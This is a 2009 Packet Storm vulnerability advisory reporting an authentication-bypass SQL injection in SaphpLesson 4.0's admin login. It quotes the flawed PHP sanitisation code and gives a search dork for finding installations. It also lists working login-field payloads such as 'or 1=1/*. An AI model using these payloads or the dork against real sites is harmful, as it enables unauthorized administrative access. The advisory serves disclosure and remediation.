SaphpLesson 4.0 SQL Injection

2009-07-24T00:00:00
ID PACKETSTORM:79588
Type packetstorm
Reporter SwEET-DeViL
Modified 2009-07-24T00:00:00

Description

                                        
                                            `---------------------------------SaphpLesson v4.0 (Auth Bypass) SQL Injection Vulnerability---------------------------------------  
#   
# #### # ### ## ### #### #### ### ##### #### #### ### # ### #### ######  
## # # ## # # # # # # # # # # # # # # # # # # # ## # # # # # #  
# # # # # # # # # # # # # # # # # # # # # # # # #   
# # ### # # ### # # ## ### ### # # # # ### ## # # # ### #   
#### # # #### # # ###### # # # # # # # # # # # # # # #   
# # # # # # # # # # # # # # ## # # # # # # # ## # #   
## ##### ## ###### ### ### #### ### # # ### #### #### ### # ### # #### ###   
  
  
#----------------------------------------------------------------------------------------------------------------  
Script : SaphpLesson  
version : 4.0  
Language: PHP  
Site: http://www.saphplesson.org  
Download: http://www.saphplesson.org/saphplesson.zip  
Dork: intext:Powered by SaphpLesson 4.0  
Found by: SwEET-DeViL  
  
need magic_quotes_gpc = Off  
  
#----------------------------------------------------------------------------------------------------------------  
  
)=> admin/login.php  
.................................................................................................................  
if ($_SERVER["REQUEST_METHOD"]=="POST"){  
$username = CleanVar($_POST["cp_username"]); <======================================{  
$password = md5(CleanVar($_POST["cp_password"]));  
$IsLogin = $db->get_var("select count(*) from modretor Where ModName='".$username."' and ModPassword='".$password."'");  
  
.................................................................................................................  
  
function of insecure !!  
  
)-)=> includes/functions.php  
---------------------------------------  
.[106] function CleanVar($var)  
.[107] {  
.[108] (get_magic_quotes_gpc() === 0) ? $var : addslashes($var);  
.[109]  
.[110] return htmlspecialchars(trim($var));  
.[111] }  
---------------------------------------  
  
#Exploit:  
  
username : 'or 1=1/*  
OR   
username : 'or 1=1 or '  
OR   
username : admin ' or ' 1=1--  
....  
  
password: SwEET-DeViL  
  
---------------------------------------  
  
  
/-------------www.arab4services.net-----------------\  
|+------------------------------------------------+ |  
|| SwEET-DeViL & viP HaCkEr | |  
|| gamr-14(at)hotmail.com | |  
|+------------------------------------------------+ |  
\---------------------------------------------------/  
  
  
`